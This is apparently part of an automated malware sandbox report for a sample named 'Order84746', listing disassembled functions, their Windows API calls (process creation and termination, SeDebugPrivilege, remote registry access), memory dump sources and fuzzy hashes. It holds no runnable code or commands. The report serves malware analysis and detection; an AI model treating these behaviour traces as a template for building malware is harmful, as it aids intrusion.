                          • Opcode Fuzzy Hash: 95b321a317bb2ed6b5ce9cbcba668da398c21475d8905b0f5c4e2c5bf615b40e
                          • Instruction Fuzzy Hash: 7FF10875A00209EFCB04DF94C888EAEB7B9FF89315F108459FA15AB250DB71AE45CF90
                          Function 009424D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 009424F5
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00942688
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009426AC
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009426EC
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0094270E
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0094286F
                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009428A1
                          • CloseHandle.KERNEL32(?), ref: 009428D0
                          • CloseHandle.KERNEL32(?), ref: 00942947
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                          • String ID:
                          • API String ID: 4090791747-0
                          • Opcode ID: 6e29de12529e8e5f3f6d98698aea1a7b43ce11d2c7ebac428dd8310f02542de4
                          • Instruction ID: ccfdfe6e73715163680ea09fa3e10150dcf1814c0d0ffdcc4bda03530cb2979e
                          • Opcode Fuzzy Hash: 6e29de12529e8e5f3f6d98698aea1a7b43ce11d2c7ebac428dd8310f02542de4
                          • Instruction Fuzzy Hash: 84D19A316042409FCB14EF29C891B6EBBE5FF85314F18885DF9999B2A2DB31EC44CB52
                          Function 008FB73E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008FB759,?,00000000,?,?,?,?,008FB72B,00000000,?), ref: 008FBA58
                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,008FB72B), ref: 008FB7F6
                          • KillTimer.USER32(00000000,?,00000000,?,?,?,?,008FB72B,00000000,?,?,008FB2EF,?,?), ref: 008FB88D
                          • DestroyAcceleratorTable.USER32(00000000), ref: 0095D8A6
                          • DeleteObject.GDI32(00000000), ref: 0095D91C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                          • String ID:
                          • API String ID: 2402799130-0
                          • Opcode ID: a214572b062b181cd624e904dfd78063489b5e59ec8d1bbf94adab88da39fad7
                          • Instruction ID: ad5574bd307526d638e2df830c7cd7ef1e2f4d54ba663772b8482d9e277eb262
                          • Opcode Fuzzy Hash: a214572b062b181cd624e904dfd78063489b5e59ec8d1bbf94adab88da39fad7
                          • Instruction Fuzzy Hash: 36619B30926608CFDB359F29D988B35B7F9FF96356F14012DE642C6A70C770A884EB80
                          Function 0094B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                          Download Yara Rule
                          APIs
                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0094B3F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: InvalidateRect
                          • String ID:
                          • API String ID: 634782764-0
                          • Opcode ID: 0bf30f365946f6f308ec44bf0b6775d879a05df205a6fb88edc872c0d9555bc3
                          • Instruction ID: 71a97eca58ebf81e7cefa0d6e68cc68f0ad8065630945918b165d56739af080f
                          • Opcode Fuzzy Hash: 0bf30f365946f6f308ec44bf0b6775d879a05df205a6fb88edc872c0d9555bc3
                          • Instruction Fuzzy Hash: 6951C130A05208BFEF249F29CC85FAD7BA8FF05764F244415F625D62E2C771E9409B51
                          Function 008FA699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0095DB1B
                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0095DB3C
                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0095DB51
                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0095DB6E
                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0095DB95
                          • DestroyCursor.USER32(00000000), ref: 0095DBA0
                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0095DBBD
                          • DestroyCursor.USER32(00000000), ref: 0095DBC8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CursorDestroyExtractIconImageLoadMessageSend
                          • String ID:
                          • API String ID: 3992029641-0
                          • Opcode ID: 1e622ef4946e1ab1e15bb6d562f85c4c6859b7683d4f822bb8333a70ff0aed65
                          • Instruction ID: 0f762dd0e50f7adfb03e93f66d2c0039b6eedb9b55e4a45c90a4a83104bd5597
                          • Opcode Fuzzy Hash: 1e622ef4946e1ab1e15bb6d562f85c4c6859b7683d4f822bb8333a70ff0aed65
                          • Instruction Fuzzy Hash: E1517970A15209AFDB24DF69CC81FAA77B9FB58364F100518FA5AD6290D7B0AC80DB91
                          Function 00927555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00926EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00925FA6,?), ref: 00926ED8
                            • Part of subcall function 00926EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00925FA6,?), ref: 00926EF1
                            • Part of subcall function 009272CB: GetFileAttributesW.KERNEL32(?,00926019), ref: 009272CC
                          • lstrcmpiW.KERNEL32(?,?), ref: 009275CA
                          • _wcscmp.LIBCMT ref: 009275E2
                          • MoveFileW.KERNEL32(?,?), ref: 009275FB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                          • String ID:
                          • API String ID: 793581249-0
                          • Opcode ID: 2d3b0bed94468069a5f0c67d9e8d4c7f8aa8276bec932da58000fc699ac2e6ef
                          • Instruction ID: 95567789715b04d5dec07a1d3521563b5c16900dc04b897c3ae2537e720d13b1
                          • Opcode Fuzzy Hash: 2d3b0bed94468069a5f0c67d9e8d4c7f8aa8276bec932da58000fc699ac2e6ef
                          • Instruction Fuzzy Hash: CC5143B2A092299EDF54EB94E841EDEB3BCAF48310F00449AF605E3145EB7497C9CF60
                          Function 008FEA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0095DAD1,00000004,00000000,00000000), ref: 008FEAEB
                          • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0095DAD1,00000004,00000000,00000000), ref: 008FEB32
                          • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0095DAD1,00000004,00000000,00000000), ref: 0095DC86
                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0095DAD1,00000004,00000000,00000000), ref: 0095DCF2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ShowWindow
                          • String ID:
                          • API String ID: 1268545403-0
                          • Opcode ID: 675ea7ff80aa2ce70f0df1dd47ad233c605d5ffc6fe537b18afe85c7105a165b
                          • Instruction ID: 5d45c63b02381f52ff1c26fb43c6ba8254fdc306d1fbecdbc655422a03e3be78
                          • Opcode Fuzzy Hash: 675ea7ff80aa2ce70f0df1dd47ad233c605d5ffc6fe537b18afe85c7105a165b
                          • Instruction Fuzzy Hash: 6241F57071E288DAD7358B39CD8DA3A7A9AFB52325F19080DE397E6571C6B0A844E311
                          Function 0091B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0091AEF1,00000B00,?,?), ref: 0091B26C
                          • RtlAllocateHeap.NTDLL(00000000,?,0091AEF1), ref: 0091B273
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0091AEF1,00000B00,?,?), ref: 0091B288
                          • GetCurrentProcess.KERNEL32(?,00000000,?,0091AEF1,00000B00,?,?), ref: 0091B290
                          • DuplicateHandle.KERNEL32(00000000,?,0091AEF1,00000B00,?,?), ref: 0091B293
                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0091AEF1,00000B00,?,?), ref: 0091B2A3
                          • GetCurrentProcess.KERNEL32(0091AEF1,00000000,?,0091AEF1,00000B00,?,?), ref: 0091B2AB
                          • DuplicateHandle.KERNEL32(00000000,?,0091AEF1,00000B00,?,?), ref: 0091B2AE
                          • CreateThread.KERNEL32(00000000,00000000,0091B2D4,00000000,00000000,00000000), ref: 0091B2C8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                          • String ID:
                          • API String ID: 1422014791-0
                          • Opcode ID: 5beea516b97b1df902a55253ae3b0096c33ba4a65148f2443555e4f868629548
                          • Instruction ID: 7d100be841b70625bcfa6c55608f96be590fc850632ce1d3b72870e265648181
                          • Opcode Fuzzy Hash: 5beea516b97b1df902a55253ae3b0096c33ba4a65148f2443555e4f868629548
                          • Instruction Fuzzy Hash: 230119B1755348BFEB10AFA5DD4DF6B3BACEB89704F018415FA14CB2A1CAB09800DB21
                          Function 0093C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID: NULL Pointer assignment$Not an Object type
                          • API String ID: 0-572801152
                          • Opcode ID: 0e1952dc82fbb793d2c6dd2faf24295f63bd2c0ad8e46340c291c4e560d68f35
                          • Instruction ID: 35bc1594390523effe598973b286481e48455a7313c3f09e479927be13e492ac
                          • Opcode Fuzzy Hash: 0e1952dc82fbb793d2c6dd2faf24295f63bd2c0ad8e46340c291c4e560d68f35
                          • Instruction Fuzzy Hash: A8E1A4B1A00619AFDF14DFA8D885BAE77B9EF48314F148429F905BB281D770AD41CF90
                          Function 0094172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00926532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00926554
                            • Part of subcall function 00926532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00926564
                            • Part of subcall function 00926532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 009265F9
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0094179A
                          • GetLastError.KERNEL32 ref: 009417AD
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009417D9
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00941855
                          • GetLastError.KERNEL32(00000000), ref: 00941860
                          • CloseHandle.KERNEL32(00000000), ref: 00941895
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                          • String ID: SeDebugPrivilege
                          • API String ID: 2533919879-2896544425
                          • Opcode ID: 1061feba652fc5e1b773f731d6d90bbb57d99f022b939cfbba1c1125f15f80c3
                          • Instruction ID: 58067c960383b533769a6d7a8e6cd38d9c79db7e77566388898148283343b0eb
                          • Opcode Fuzzy Hash: 1061feba652fc5e1b773f731d6d90bbb57d99f022b939cfbba1c1125f15f80c3
                          • Instruction Fuzzy Hash: 9441BF71700200AFDB15EF68D995FADB7A5BF44310F058458FA069F3D2DBB8A944CBA2
                          Function 00925819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadIconW.USER32(00000000,00007F03), ref: 009258B8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: IconLoad
                          • String ID: blank$info$question$stop$warning
                          • API String ID: 2457776203-404129466
                          • Opcode ID: e3db922c8c24cd3fef85ac1e6d035c4ea4506ebf0d06a8842b0e99906dbf3c77
                          • Instruction ID: 75486008e3f733dc100270559e3fb31090a23a6bccf2adfa721897cf216f7b6d
                          • Opcode Fuzzy Hash: e3db922c8c24cd3fef85ac1e6d035c4ea4506ebf0d06a8842b0e99906dbf3c77
                          • Instruction Fuzzy Hash: C8110D7570D757BFEB056F54AC82E6A239CAF96314F21003AF610E52C5E7F4AA005264
                          Function 0092A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                          Download Yara Rule
                          APIs
                          • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0092A806
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ArraySafeVartype
                          • String ID:
                          • API String ID: 1725837607-0
                          • Opcode ID: f6cbee7401cc85637549fd04a17afbd89cf1c4777c521f69470816908b3550a1
                          • Instruction ID: b99208c8e0242683ad13d171490504d5c530ee1dd7b101e14cbbf4002f0c2a41
                          • Opcode Fuzzy Hash: f6cbee7401cc85637549fd04a17afbd89cf1c4777c521f69470816908b3550a1
                          • Instruction Fuzzy Hash: 88C1AF76A0522ADFDB00CF98E481BBEB7F5FF08310F204469E615E7291D734AA81CB95
                          Function 00926B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00926B63
                          • LoadStringW.USER32(00000000), ref: 00926B6A
                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00926B80
                          • LoadStringW.USER32(00000000), ref: 00926B87
                          • _wprintf.LIBCMT ref: 00926BAD
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00926BCB
                          Strings
                          • %s (%d) : ==> %s: %s %s, xrefs: 00926BA8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: HandleLoadModuleString$Message_wprintf
                          • String ID: %s (%d) : ==> %s: %s %s
                          • API String ID: 3648134473-3128320259
                          • Opcode ID: 4d50daed917aec7f73a8562b753fa7b5b1a5ebdbaa6f94320a556c19e6b930ab
                          • Instruction ID: 7a91284d4c763e02fbdbff632bfebef654794977368a92bb9a918a98b60f317e
                          • Opcode Fuzzy Hash: 4d50daed917aec7f73a8562b753fa7b5b1a5ebdbaa6f94320a556c19e6b930ab
                          • Instruction Fuzzy Hash: 2E0162F69042187FEB11ABA49D89EE6366CD708304F4044A5F756E2041EAB49E849B70
                          Function 00942B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00943C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00942BB5,?,?), ref: 00943C1D
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00942BF6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: BuffCharConnectRegistryUpper
                          • String ID:
                          • API String ID: 2595220575-0
                          • Opcode ID: ad4ed86df838f6422e398c37fed7e496318ef4d3029e0b8015d3c2f6c47abb1e
                          • Instruction ID: c277d4db1c86e77adcb6bb54bddbbe2bdedfd78eb9a7545f5ca37b4e33852895
                          • Opcode Fuzzy Hash: ad4ed86df838f6422e398c37fed7e496318ef4d3029e0b8015d3c2f6c47abb1e
                          • Instruction Fuzzy Hash: B991AA71604201AFCB10EF29C891F6EB7E5FF89310F04885DF9969B2A2DB74E905DB42
                          Function 0090A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __mtinitlocknum.LIBCMT ref: 0090A991
                            • Part of subcall function 00907D7C: __FF_MSGBANNER.LIBCMT ref: 00907D91
                            • Part of subcall function 00907D7C: __NMSG_WRITE.LIBCMT ref: 00907D98
                            • Part of subcall function 00907D7C: __malloc_crt.LIBCMT ref: 00907DB8
                          • __lock.LIBCMT ref: 0090A9A4
                          • __lock.LIBCMT ref: 0090A9F0
                          • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00996DE0,00000018,00915E7B,?,00000000,00000109), ref: 0090AA0C
                          • RtlEnterCriticalSection.NTDLL(8000000C), ref: 0090AA29
                          • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0090AA39
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
